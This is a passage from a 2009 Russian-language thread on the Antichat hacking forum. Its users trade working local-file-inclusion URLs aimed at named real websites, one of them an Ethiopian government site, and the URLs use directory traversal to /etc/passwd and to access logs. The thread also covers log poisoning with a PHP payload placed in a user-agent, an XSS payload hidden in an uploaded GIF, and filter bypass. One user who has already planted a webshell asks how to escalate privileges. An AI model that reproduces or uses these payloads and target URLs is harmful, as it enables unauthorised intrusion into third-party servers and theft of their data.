ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
29.06.2009, 00:47
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от DeepXhadow
Несколько страниц был спор об этом инклуде...у меня вопрос остался
Полему при LFI не исполнился php код? Что я сделал не так?
ОМГ !!! ОМФГ!!!
Несколько страниц было объяснение одному господину, теперь второму нужно объяснить?
Я помоему тебе сразу ответил.
Это не инклуд там file()
вот мой пост:
https://forum.antichat.ru/showpost.php?p=1327108&postcount=7572
А если у кого-то там инклуд, пиши ему в ПМ, и пусть он тебе сам объясняет почему код не исполняется
|
|
|
29.06.2009, 09:28
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Помогите пожлауйста найти httpd.conf на этом инклуде
http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
|
|
|
|
29.06.2009, 09:52
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от nub-hacker
Помогите пожлауйста найти httpd.conf на этом инклуде
http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
Код:
http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
217.26.52.37 отсюда логирует...
|
|
|
|
29.06.2009, 10:00
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Сообщение от DimOnOID
Код:
http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
217.26.52.37 отсюда логирует...
спс, поставте ему +5.
ЗЫ плиз, не лейте шелл до меня, пожалуйста =)
|
|
|
|
29.06.2009, 11:23
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Ещё вопрос.
http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../var/log/httpd-access.log
вот лог. Что надо вписаь в инеткряк чтобы оставить запись в этом или еррор логе
=================
Вот ещё:
http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../var/log/httpd-access.log
но мне опять не везёт. php код не выполняется =(
вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"
Последний раз редактировалось nub-hacker; 29.06.2009 в 11:59..
|
|
|
|
29.06.2009, 12:13
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от nub-hacker
но мне опять не везёт. php код не выполняется =(
вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"
http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=это%20не%20инкл уд
Warning: fopen(articles/это не инклуд):
|
|
|
|
29.06.2009, 12:15
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
PHP код:
function CheckExt($filename, $ext)
{
$name = strtolower($filename);
if(substr($name, strlen($name) -3, 3) == $ext)
return true;
else
return false;
}
Этот скрипт уязвим?(он проверяет расш. файла при заливке) Вот что я пытался сделать...
Поскоку скрипт проверяет токо название файла (что за расширение стоит в конце) то я попробывал залить gif а в гифе в конце файла (после ";" (без ковычек)) подставить это
PHP код:
<html><script>alert(//)</script></html>
Подставил... Зашел через IE(картинка битая была при просмотре), в итоге алерта нету! В чем дело? |
|
|
|
29.06.2009, 12:25
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165
Репутация:
-67
|
|
Спс, jokester. А есть ли скрипт который сам проверят на дефолтные пути к конфигам и логам? в одной теме где дефолтные пути там есть атач от Elekt. Но архив битый, не открывается. Может гдето ещё есть?
ЗЫ можно в дальнеёшем просто joker?
|
|
|
|
29.06.2009, 18:54
|
|
Новичок
Регистрация: 24.11.2008
Сообщений: 24
Провел на форуме:
338992
Репутация:
44
|
|
Есть вопрос по Xss уязвимостям: если фильтр фильтрует(ой..) \ заменяя его на html код (c semicolons) так вот... возможно ли как то обойти эту фильтрацию?
Последний раз редактировалось Damned_one; 29.06.2009 в 18:58..
|
|
|
|
29.06.2009, 20:26
|
|
Новичок
Регистрация: 30.04.2009
Сообщений: 18
Провел на форуме:
97464
Репутация:
5
|
|
Залил вебшелл, но у него права nobody, соответственно сильно не разгуляешься (интересует редактирование файлов). Можно ли как то получить права хотя бы юзверя в папку которого залит шелл, кроме как рутать сервак?
Система Freeebsd 6.2.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
